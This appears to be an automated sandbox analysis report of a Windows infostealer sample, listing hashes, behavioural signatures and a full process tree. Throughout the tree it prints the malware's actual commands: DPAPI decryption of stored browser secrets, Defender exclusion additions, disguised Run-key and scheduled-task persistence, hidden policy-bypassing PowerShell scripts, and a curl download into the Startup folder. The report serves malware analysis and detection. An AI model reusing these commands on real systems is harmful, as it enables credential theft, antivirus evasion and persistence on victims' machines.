Analysis
-
max time kernel
300s -
max time network
304s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
03-06-2024 09:47
Static task
static1
Behavioral task
behavioral1
Sample
xylex.exe
Resource
win7-20240508-en
Behavioral task
behavioral2
Sample
xylex.exe
Resource
win10v2004-20240426-en
General
-
Target
xylex.exe
-
Size
37.6MB
-
MD5
8eacf3f9be7e3735352c4020fc4e05e9
-
SHA1
0bb6c048d9e683e152de21f7d368a4c151095504
-
SHA256
4c5b20b4ca8009ab72a76ed7fa6e09bd1b0b78969980f2b49d9a6641439c8d7e
-
SHA512
2f5c54c4561f14fbf9a58075dffe268247f3af3408084c12a8a7ed0fbb33f01448e85a06ba684b037e0489fbcbb7481a825cf23785c7b7c1d60c28467825e3f0
-
SSDEEP
786432:R3on1HvSzxAMNjFZArYs4nPv0so7OZJJe:RYn1HvSpNjXm4P5u2e
Malware Config
Signatures
-
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 2448 powershell.exe 4444 powershell.exe 2440 powershell.exe 396 powershell.exe 3052 powershell.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
xylex.execscript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Control Panel\International\Geo\Nation xylex.exe Key value queried \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Control Panel\International\Geo\Nation cscript.exe -
Loads dropped DLL 1 IoCs
Processes:
xylex.exepid process 3396 xylex.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
powershell.exereg.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Powershell = "\"powershell.exe\" -WindowStyle Hidden -ExecutionPolicy Bypass -File \"C:\\Users\\Admin\\AppData\\Roaming\\gVudEeAjIOYTLzJ.ps1\"" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Steam = "C:\\Users\\Admin\\AppData\\Local\\Temp\\xylex.exe" reg.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 12 api.ipify.org -
An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs
Processes:
cmd.execmd.exepid process 508 cmd.exe 2216 cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Detects videocard installed 1 TTPs 9 IoCs
Uses WMIC.exe to determine videocard installed.
Processes:
WMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exepid process 3400 WMIC.exe 3748 WMIC.exe 4560 WMIC.exe 1216 WMIC.exe 4732 WMIC.exe 1456 WMIC.exe 3888 WMIC.exe 3828 WMIC.exe 3436 WMIC.exe -
Enumerates processes with tasklist 1 TTPs 2 IoCs
Processes:
tasklist.exetasklist.exepid process 4404 tasklist.exe 4484 tasklist.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
chrome.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe -
Modifies data under HKEY_USERS 2 IoCs
Processes:
chrome.exedescription ioc process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133618820258415901" chrome.exe -
Modifies registry key 1 TTPs 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 48 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exexylex.exepowershell.exepowershell.exepowershell.exepowershell.exechrome.exechrome.exepid process 4444 powershell.exe 4444 powershell.exe 1020 powershell.exe 1020 powershell.exe 3580 powershell.exe 3580 powershell.exe 2440 powershell.exe 2440 powershell.exe 396 powershell.exe 396 powershell.exe 396 powershell.exe 3588 powershell.exe 3588 powershell.exe 3588 powershell.exe 3052 powershell.exe 3052 powershell.exe 3052 powershell.exe 1660 powershell.exe 1660 powershell.exe 1660 powershell.exe 3580 powershell.exe 3580 powershell.exe 3580 powershell.exe 2448 powershell.exe 2448 powershell.exe 2448 powershell.exe 636 powershell.exe 636 powershell.exe 636 powershell.exe 3940 powershell.exe 3940 powershell.exe 3396 xylex.exe 3396 xylex.exe 3148 powershell.exe 3148 powershell.exe 3396 xylex.exe 3624 powershell.exe 3624 powershell.exe 3092 powershell.exe 3092 powershell.exe 3092 powershell.exe 3364 powershell.exe 3364 powershell.exe 3364 powershell.exe 4512 chrome.exe 4512 chrome.exe 3580 chrome.exe 3580 chrome.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
Processes:
chrome.exepid process 4512 chrome.exe 4512 chrome.exe 4512 chrome.exe 4512 chrome.exe 4512 chrome.exe 4512 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exetasklist.exetasklist.exepowershell.exepowershell.exeWMIC.exepowershell.exeWMIC.exedescription pid process Token: SeDebugPrivilege 4444 powershell.exe Token: SeDebugPrivilege 4484 tasklist.exe Token: SeDebugPrivilege 4404 tasklist.exe Token: SeDebugPrivilege 1020 powershell.exe Token: SeDebugPrivilege 3580 powershell.exe Token: SeIncreaseQuotaPrivilege 4188 WMIC.exe Token: SeSecurityPrivilege 4188 WMIC.exe Token: SeTakeOwnershipPrivilege 4188 WMIC.exe Token: SeLoadDriverPrivilege 4188 WMIC.exe Token: SeSystemProfilePrivilege 4188 WMIC.exe Token: SeSystemtimePrivilege 4188 WMIC.exe Token: SeProfSingleProcessPrivilege 4188 WMIC.exe Token: SeIncBasePriorityPrivilege 4188 WMIC.exe Token: SeCreatePagefilePrivilege 4188 WMIC.exe Token: SeBackupPrivilege 4188 WMIC.exe Token: SeRestorePrivilege 4188 WMIC.exe Token: SeShutdownPrivilege 4188 WMIC.exe Token: SeDebugPrivilege 4188 WMIC.exe Token: SeSystemEnvironmentPrivilege 4188 WMIC.exe Token: SeRemoteShutdownPrivilege 4188 WMIC.exe Token: SeUndockPrivilege 4188 WMIC.exe Token: SeManageVolumePrivilege 4188 WMIC.exe Token: 33 4188 WMIC.exe Token: 34 4188 WMIC.exe Token: 35 4188 WMIC.exe Token: 36 4188 WMIC.exe Token: SeDebugPrivilege 2440 powershell.exe Token: SeIncreaseQuotaPrivilege 4188 WMIC.exe Token: SeSecurityPrivilege 4188 WMIC.exe Token: SeTakeOwnershipPrivilege 4188 WMIC.exe Token: SeLoadDriverPrivilege 4188 WMIC.exe Token: SeSystemProfilePrivilege 4188 WMIC.exe Token: SeSystemtimePrivilege 4188 WMIC.exe Token: SeProfSingleProcessPrivilege 4188 WMIC.exe Token: SeIncBasePriorityPrivilege 4188 WMIC.exe Token: SeCreatePagefilePrivilege 4188 WMIC.exe Token: SeBackupPrivilege 4188 WMIC.exe Token: SeRestorePrivilege 4188 WMIC.exe Token: SeShutdownPrivilege 4188 WMIC.exe Token: SeDebugPrivilege 4188 WMIC.exe Token: SeSystemEnvironmentPrivilege 4188 WMIC.exe Token: SeRemoteShutdownPrivilege 4188 WMIC.exe Token: SeUndockPrivilege 4188 WMIC.exe Token: SeManageVolumePrivilege 4188 WMIC.exe Token: 33 4188 WMIC.exe Token: 34 4188 WMIC.exe Token: 35 4188 WMIC.exe Token: 36 4188 WMIC.exe Token: SeIncreaseQuotaPrivilege 3624 WMIC.exe Token: SeSecurityPrivilege 3624 WMIC.exe Token: SeTakeOwnershipPrivilege 3624 WMIC.exe Token: SeLoadDriverPrivilege 3624 WMIC.exe Token: SeSystemProfilePrivilege 3624 WMIC.exe Token: SeSystemtimePrivilege 3624 WMIC.exe Token: SeProfSingleProcessPrivilege 3624 WMIC.exe Token: SeIncBasePriorityPrivilege 3624 WMIC.exe Token: SeCreatePagefilePrivilege 3624 WMIC.exe Token: SeBackupPrivilege 3624 WMIC.exe Token: SeRestorePrivilege 3624 WMIC.exe Token: SeShutdownPrivilege 3624 WMIC.exe Token: SeDebugPrivilege 3624 WMIC.exe Token: SeSystemEnvironmentPrivilege 3624 WMIC.exe Token: SeRemoteShutdownPrivilege 3624 WMIC.exe Token: SeUndockPrivilege 3624 WMIC.exe -
Suspicious use of FindShellTrayWindow 26 IoCs
Processes:
chrome.exepid process 4512 chrome.exe 4512 chrome.exe 4512 chrome.exe 4512 chrome.exe 4512 chrome.exe 4512 chrome.exe 4512 chrome.exe 4512 chrome.exe 4512 chrome.exe 4512 chrome.exe 4512 chrome.exe 4512 chrome.exe 4512 chrome.exe 4512 chrome.exe 4512 chrome.exe 4512 chrome.exe 4512 chrome.exe 4512 chrome.exe 4512 chrome.exe 4512 chrome.exe 4512 chrome.exe 4512 chrome.exe 4512 chrome.exe 4512 chrome.exe 4512 chrome.exe 4512 chrome.exe -
Suspicious use of SendNotifyMessage 24 IoCs
Processes:
chrome.exepid process 4512 chrome.exe 4512 chrome.exe 4512 chrome.exe 4512 chrome.exe 4512 chrome.exe 4512 chrome.exe 4512 chrome.exe 4512 chrome.exe 4512 chrome.exe 4512 chrome.exe 4512 chrome.exe 4512 chrome.exe 4512 chrome.exe 4512 chrome.exe 4512 chrome.exe 4512 chrome.exe 4512 chrome.exe 4512 chrome.exe 4512 chrome.exe 4512 chrome.exe 4512 chrome.exe 4512 chrome.exe 4512 chrome.exe 4512 chrome.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
xylex.execmd.exepowershell.execsc.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 3396 wrote to memory of 1648 3396 xylex.exe cmd.exe PID 3396 wrote to memory of 1648 3396 xylex.exe cmd.exe PID 1648 wrote to memory of 804 1648 cmd.exe cmd.exe PID 1648 wrote to memory of 804 1648 cmd.exe cmd.exe PID 1648 wrote to memory of 4444 1648 cmd.exe powershell.exe PID 1648 wrote to memory of 4444 1648 cmd.exe powershell.exe PID 4444 wrote to memory of 4876 4444 powershell.exe csc.exe PID 4444 wrote to memory of 4876 4444 powershell.exe csc.exe PID 4876 wrote to memory of 2836 4876 csc.exe cvtres.exe PID 4876 wrote to memory of 2836 4876 csc.exe cvtres.exe PID 3396 wrote to memory of 1536 3396 xylex.exe cmd.exe PID 3396 wrote to memory of 1536 3396 xylex.exe cmd.exe PID 3396 wrote to memory of 856 3396 xylex.exe cmd.exe PID 3396 wrote to memory of 856 3396 xylex.exe cmd.exe PID 1536 wrote to memory of 2524 1536 cmd.exe curl.exe PID 1536 wrote to memory of 2524 1536 cmd.exe curl.exe PID 856 wrote to memory of 4484 856 cmd.exe tasklist.exe PID 856 wrote to memory of 4484 856 cmd.exe tasklist.exe PID 3396 wrote to memory of 1208 3396 xylex.exe curl.exe PID 3396 wrote to memory of 1208 3396 xylex.exe curl.exe PID 3396 wrote to memory of 508 3396 xylex.exe cmd.exe PID 3396 wrote to memory of 508 3396 xylex.exe cmd.exe PID 1208 wrote to memory of 4404 1208 cmd.exe tasklist.exe PID 1208 wrote to memory of 4404 1208 cmd.exe tasklist.exe PID 508 wrote to memory of 1020 508 cmd.exe WMIC.exe PID 508 wrote to memory of 1020 508 cmd.exe WMIC.exe PID 3396 wrote to memory of 2216 3396 xylex.exe cmd.exe PID 3396 wrote to memory of 2216 3396 xylex.exe cmd.exe PID 2216 wrote to memory of 3580 2216 cmd.exe powershell.exe PID 2216 wrote to memory of 3580 2216 cmd.exe powershell.exe PID 3396 wrote to memory of 1712 3396 xylex.exe cmd.exe PID 3396 wrote to memory of 1712 3396 xylex.exe cmd.exe PID 3396 wrote to memory of 5040 3396 xylex.exe cmd.exe PID 3396 wrote to memory of 5040 3396 xylex.exe cmd.exe PID 3396 wrote to memory of 2740 3396 xylex.exe cmd.exe PID 3396 wrote to memory of 2740 3396 xylex.exe cmd.exe PID 1712 wrote to memory of 4188 1712 cmd.exe WMIC.exe PID 1712 wrote to memory of 4188 1712 cmd.exe WMIC.exe PID 5040 wrote to memory of 4920 5040 cmd.exe reg.exe PID 5040 wrote to memory of 4920 5040 cmd.exe reg.exe PID 3396 wrote to memory of 404 3396 xylex.exe cmd.exe PID 3396 wrote to memory of 404 3396 xylex.exe cmd.exe PID 2740 wrote to memory of 716 2740 cmd.exe schtasks.exe PID 2740 wrote to memory of 716 2740 cmd.exe schtasks.exe PID 404 wrote to memory of 2440 404 cmd.exe powershell.exe PID 404 wrote to memory of 2440 404 cmd.exe powershell.exe PID 3396 wrote to memory of 1884 3396 xylex.exe cmd.exe PID 3396 wrote to memory of 1884 3396 xylex.exe cmd.exe PID 1884 wrote to memory of 3624 1884 cmd.exe WMIC.exe PID 1884 wrote to memory of 3624 1884 cmd.exe WMIC.exe PID 3396 wrote to memory of 4720 3396 xylex.exe cmd.exe PID 3396 wrote to memory of 4720 3396 xylex.exe cmd.exe PID 3396 wrote to memory of 3636 3396 xylex.exe cmd.exe PID 3396 wrote to memory of 3636 3396 xylex.exe cmd.exe PID 4720 wrote to memory of 2004 4720 cmd.exe cscript.exe PID 4720 wrote to memory of 2004 4720 cmd.exe cscript.exe PID 3636 wrote to memory of 4916 3636 cmd.exe WMIC.exe PID 3636 wrote to memory of 4916 3636 cmd.exe WMIC.exe PID 3396 wrote to memory of 3324 3396 xylex.exe cmd.exe PID 3396 wrote to memory of 3324 3396 xylex.exe cmd.exe PID 3324 wrote to memory of 3480 3324 cmd.exe WaaSMedicAgent.exe PID 3324 wrote to memory of 3480 3324 cmd.exe WaaSMedicAgent.exe PID 3324 wrote to memory of 4980 3324 cmd.exe find.exe PID 3324 wrote to memory of 4980 3324 cmd.exe find.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\xylex.exe"C:\Users\Admin\AppData\Local\Temp\xylex.exe"1⤵
- Checks computer location settings
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3396 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "type .\temp.ps1 | powershell.exe -noprofile -"2⤵
- Suspicious use of WriteProcessMemory
PID:1648 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" type .\temp.ps1 "3⤵PID:804
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -noprofile -3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4444 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\p22tuu2q\p22tuu2q.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:4876 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES85E9.tmp" "c:\Users\Admin\AppData\Local\Temp\p22tuu2q\CSCA1265762AF2049E0913954F9F1C15260.TMP"5⤵PID:2836
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"2⤵
- Suspicious use of WriteProcessMemory
PID:1536 -
C:\Windows\system32\curl.execurl http://api.ipify.org/ --ssl-no-revoke3⤵PID:2524
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵
- Suspicious use of WriteProcessMemory
PID:856 -
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4484 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵
- Suspicious use of WriteProcessMemory
PID:1208 -
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4404 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,21,13,251,61,125,41,113,73,181,63,165,1,91,36,248,68,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,52,149,19,144,89,112,59,59,251,229,141,202,64,101,240,104,137,13,3,69,53,156,155,146,175,90,146,162,246,238,201,90,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,8,59,176,18,137,226,140,52,19,171,62,247,31,153,110,138,40,43,108,72,120,10,22,206,204,166,195,251,206,76,84,236,48,0,0,0,182,67,21,24,178,28,183,38,171,5,235,33,128,96,100,191,115,29,3,244,255,89,222,94,221,44,46,134,199,244,235,56,71,157,109,19,168,133,44,36,119,44,14,122,209,122,31,112,64,0,0,0,122,214,19,81,118,163,136,78,57,148,251,210,240,3,134,99,156,175,50,154,230,153,101,220,35,132,92,147,223,230,14,232,202,102,120,97,201,199,70,225,226,97,114,2,149,239,63,52,211,209,152,49,2,92,152,238,148,185,58,73,30,45,12,201), $null, 'CurrentUser')"2⤵
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
PID:508 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,21,13,251,61,125,41,113,73,181,63,165,1,91,36,248,68,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,52,149,19,144,89,112,59,59,251,229,141,202,64,101,240,104,137,13,3,69,53,156,155,146,175,90,146,162,246,238,201,90,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,8,59,176,18,137,226,140,52,19,171,62,247,31,153,110,138,40,43,108,72,120,10,22,206,204,166,195,251,206,76,84,236,48,0,0,0,182,67,21,24,178,28,183,38,171,5,235,33,128,96,100,191,115,29,3,244,255,89,222,94,221,44,46,134,199,244,235,56,71,157,109,19,168,133,44,36,119,44,14,122,209,122,31,112,64,0,0,0,122,214,19,81,118,163,136,78,57,148,251,210,240,3,134,99,156,175,50,154,230,153,101,220,35,132,92,147,223,230,14,232,202,102,120,97,201,199,70,225,226,97,114,2,149,239,63,52,211,209,152,49,2,92,152,238,148,185,58,73,30,45,12,201), $null, 'CurrentUser')3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1020 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,21,13,251,61,125,41,113,73,181,63,165,1,91,36,248,68,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,87,225,225,105,74,250,17,14,121,162,50,56,214,71,202,251,32,121,40,26,5,205,214,52,26,191,58,177,200,241,246,155,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,137,230,184,142,248,175,36,120,222,4,110,117,60,85,255,52,21,39,177,126,38,76,194,9,75,54,127,87,52,196,251,57,48,0,0,0,62,242,129,76,25,82,189,44,92,5,130,128,156,115,35,25,175,83,81,85,159,232,192,255,184,181,3,127,179,216,232,85,78,47,144,255,115,62,133,108,75,82,5,154,21,128,253,243,64,0,0,0,96,3,115,172,134,228,139,54,161,25,254,150,216,24,138,103,124,43,211,181,183,191,211,17,78,104,20,9,218,8,230,157,99,145,15,109,156,238,65,113,104,211,133,73,126,187,22,212,132,81,131,66,39,202,237,184,142,225,59,166,44,170,47,76), $null, 'CurrentUser')"2⤵
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
PID:2216 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,21,13,251,61,125,41,113,73,181,63,165,1,91,36,248,68,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,87,225,225,105,74,250,17,14,121,162,50,56,214,71,202,251,32,121,40,26,5,205,214,52,26,191,58,177,200,241,246,155,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,137,230,184,142,248,175,36,120,222,4,110,117,60,85,255,52,21,39,177,126,38,76,194,9,75,54,127,87,52,196,251,57,48,0,0,0,62,242,129,76,25,82,189,44,92,5,130,128,156,115,35,25,175,83,81,85,159,232,192,255,184,181,3,127,179,216,232,85,78,47,144,255,115,62,133,108,75,82,5,154,21,128,253,243,64,0,0,0,96,3,115,172,134,228,139,54,161,25,254,150,216,24,138,103,124,43,211,181,183,191,211,17,78,104,20,9,218,8,230,157,99,145,15,109,156,238,65,113,104,211,133,73,126,187,22,212,132,81,131,66,39,202,237,184,142,225,59,166,44,170,47,76), $null, 'CurrentUser')3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3580 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"2⤵
- Suspicious use of WriteProcessMemory
PID:1712 -
C:\Windows\System32\Wbem\WMIC.exewmic diskdrive get serialnumber3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4188 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f"2⤵
- Suspicious use of WriteProcessMemory
PID:5040 -
C:\Windows\system32\reg.exereg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f3⤵PID:4920
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM"2⤵
- Suspicious use of WriteProcessMemory
PID:2740 -
C:\Windows\system32\schtasks.exeschtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM3⤵
- Creates scheduled task(s)
PID:716 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1""2⤵
- Suspicious use of WriteProcessMemory
PID:404 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1"3⤵
- Command and Scripting Interpreter: PowerShell
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2440 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\vceksnax\vceksnax.cmdline"4⤵PID:1956
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8BB5.tmp" "c:\Users\Admin\AppData\Local\Temp\vceksnax\CSCD2DBB8F6B0184DA7A2FC58E67274FB2.TMP"5⤵PID:1248
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"2⤵
- Suspicious use of WriteProcessMemory
PID:1884 -
C:\Windows\System32\Wbem\WMIC.exewmic bios get smbiosbiosversion3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3624 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs""2⤵
- Suspicious use of WriteProcessMemory
PID:4720 -
C:\Windows\system32\cscript.execscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs"3⤵
- Checks computer location settings
PID:2004 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat" "4⤵PID:1000
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:396 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3052 -
C:\Windows\system32\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\xylex.exe" /f5⤵
- Adds Run key to start application
- Modifies registry key
PID:4600 -
C:\Windows\system32\reg.exereg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam"5⤵
- Modifies registry key
PID:216 -
C:\Windows\system32\curl.execurl -o "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Steam_Service.exe" YOUR-BINDED-EXE-LINK-HERE5⤵PID:4936
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"2⤵
- Suspicious use of WriteProcessMemory
PID:3636 -
C:\Windows\System32\Wbem\WMIC.exewmic baseboard get serialnumber3⤵PID:4916
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""2⤵
- Suspicious use of WriteProcessMemory
PID:3324 -
C:\Windows\System32\Wbem\WMIC.exewmic MemoryChip get /format:list3⤵PID:3480
-
C:\Windows\system32\find.exefind /i "Speed"3⤵PID:4980
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"2⤵PID:2340
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_computersystemproduct get uuid3⤵PID:3432
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"2⤵PID:2748
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name3⤵
- Detects videocard installed
PID:4732 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"2⤵PID:3576
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3588 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController GET Description,PNPDeviceID"2⤵PID:4776
-
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Description,PNPDeviceID3⤵PID:3256
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic memorychip get serialnumber"2⤵PID:4164
-
C:\Windows\System32\Wbem\WMIC.exewmic memorychip get serialnumber3⤵PID:1020
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"2⤵PID:5064
-
C:\Windows\system32\curl.execurl http://api.ipify.org/ --ssl-no-revoke3⤵PID:1208
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"2⤵PID:4416
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid3⤵PID:5008
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic cpu get processorid"2⤵PID:924
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get processorid3⤵PID:1772
-
